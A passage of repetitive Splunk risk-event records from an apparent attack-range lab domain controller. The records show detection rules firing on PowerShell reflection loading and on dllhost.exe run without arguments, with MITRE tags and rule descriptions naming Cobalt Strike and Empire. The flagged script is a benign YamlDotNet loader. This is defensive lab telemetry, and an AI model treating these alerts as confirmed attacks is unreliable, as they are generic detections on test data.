code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664708132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664708132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664701200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664701200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1752", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664701200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664701200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x6d8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664704533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664704533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664704533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T08:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T08:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664704533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T08:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T08:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return 